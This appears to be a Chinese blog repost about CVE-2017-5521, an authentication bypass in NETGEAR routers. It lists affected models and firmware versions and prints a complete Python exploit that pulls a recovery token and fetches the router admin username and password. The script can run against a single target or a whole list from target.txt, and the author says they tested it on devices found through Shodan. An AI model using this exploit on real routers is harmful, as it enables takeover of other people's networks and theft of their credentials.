CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)
2024-05-19 16:37:40
SpiderLabs昨天发布的漏洞, 用户访问路由器的web控制界面尝试身份验证,然后又取消身份验证,用户就会被重定向到一个页面暴露密码恢复的token。然后通过passwordrecovered.cgi?id=TOKEN获取到路由器管理员密码。
漏洞细节
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911
漏洞影响范围:
Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13
Netgear漏洞利用exploit:
## netgore.py
import sys
import requestsdef scrape(text, start_trig, end_trig):if text.find(start_trig) != -1:return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]else:return "i_dont_speak_english"def exp1(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage - get token# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)token = scrape(r.text, 'unauth.cgi?id=', '\"')if token == 'i_dont_speak_english':print "not vulnerable"#sys.exit(0)returnprint "token found: " + token#2nd stage - pass the token - get the passwordurl = url + 'passwordrecovered.cgi?id=' + tokenr = requests.post(url, verify=False)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable becuse password recovery IS set"# sys.exit(0)return#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passworddef exp2(ip,port):#disable nasty insecure ssl warningrequests.packages.urllib3.disable_warnings()#1st stage# ip = sys.argv[1]# port = sys.argv[2]url = 'http://' + ip + ':' + port + '/'try:r = requests.get(url)except:url = 'https://' + ip + ':' + port + '/'r = requests.get(url, verify=False)model = r.headers.get('WWW-Authenticate')if model is not None:print "Attcking: " + model[13:-1]else:print "not a netgear router"#sys.exit(0)return#2nd stageurl = url + 'passwordrecovered.cgi?id=get_rekt'try:r = requests.post(url, verify=False)except:print "not vulnerable router"#sys.exit(0)#profitif r.text.find('left\">') != -1:username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))username = scrape(username, '>', '\'')password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))password = scrape(password, '>', '\'')if username == "i_dont_speak_english":username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))else:print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"return# sys.exit(0)#html encoding pops out of nowhere, lets replace thatpassword = password.replace("#","#")password = password.replace("&","&")print "user: " + usernameprint "pass: " + passwordif __name__ == "__main__":if len(sys.argv) > 1:ip = sys.argv[1]port = sys.argv[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)else:f = open('target.txt')for line in f:line = line.strip()l = line.split(' ')if len(l) > 1:#print lip = l[0]port = l[2]print '---------start------------'print 'target',ip,port print '---------exp1------------'exp1(ip,port)print '---------exp2------------'exp2(ip,port)f.close()
shodan搜索后测试了几个netgear设备,这个漏洞很清真:
转载于:https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html
CVE-2017-5521: Bypassing Authentication on NETGEAR Routers(Netgear认证绕过漏洞)相关推荐
- 速修复!Netgear交换机曝3个严重的认证绕过漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 昵称为 "Gynvael Coldwind" 的波兰安全研究员在网件中找到并报告了网件交换机中的三个严重漏洞 Demon's ...
- 【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现
目录 0x00 漏洞概述 0x01 影响版本 0x02 漏洞评级 0x03 shodan搜索漏洞环境 0x04 漏洞验证 0x05 修复建议 0x00 漏洞概述 友讯科技股份有限公司(D-Link C ...
- 速修复!Netgear 61款路由器和调制解调器中存在多个严重的预认证RCE漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 网络设备厂商Netgear 修复了今年的第五批严重的远程代码漏洞,这些漏洞影响的是 Netgear 的SOHO 路由器. 安全公司 GRIMM ...
- 绿盟科技网络安全威胁周报2017.19 关注Microsoft恶意软件防护引擎远程执行代码漏洞CVE-2017-0290...
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-19,绿盟科技漏洞库本周新增75条,其中高危61条.本次周报建议大家关注 Microsoft恶意软件防护引擎远程执行代码漏洞 .目前,微软官方 ...
- NETGEAR 系列路由器命令执行漏洞简析
NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...
- linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...
0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...
- php cve 2017 12933,18-017 (March 27, 2018)
描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...
- 由看雪.Wifi万能钥匙 CTF 2017 第4题分析linux double free及unlinking漏洞
相关程序可以在这里下载: http://ctf.pediy.com/game-fight-34.htm 我是在ubuntu16 64位调试的 先说下知识点吧,简单的请参考我的上一篇文章: http:/ ...
- 速修复这些Netgear Orbi路由器漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 思科Talos团队发布了Netgear Orbi 740系列路由器和扩展卫星中多个漏洞的PoC exploit,其中一个漏洞是严重的远程命令执行 ...
最新文章
- 讯飞语音识别_讯飞输入法持续功能创新 语音输入最受用户认可
- 评测指标(metrics)
- 浅谈Python Web的五大框架
- bat脚本 git pull_bat文件方式对git进行操作
- kakfa怎么看消息是否堆积_不停的打开微信,只为看你是否更新了消息
- (转载)芹菜拌豆腐皮 降压小凉菜
- linux系统在windows看不到,Linux下怎么看不到盘符啊?
- java仓库管理设计报告_基于JAVA的仓库管理系统设计毕业设计.doc
- Linux C/C++开发环境搭建指针
- gbase数据库中快速备份数据用法
- Vue+百度地图api
- coalesce函数详解--判空三目表达式
- PPT修行之路(二)-素材库
- 港湾嫁西门子梦断华为诉讼 内耗致高层离职
- python手把手安装_小白手把手搭建python开发环境
- 实验室工作站配置多用户远程连接教程(亲测有效版)
- greenplum数据库单机部署
- 学生管理系统课程设计
- 工业控制协议解析之-CA协议
- Android各种img文件作用以及系统启动过程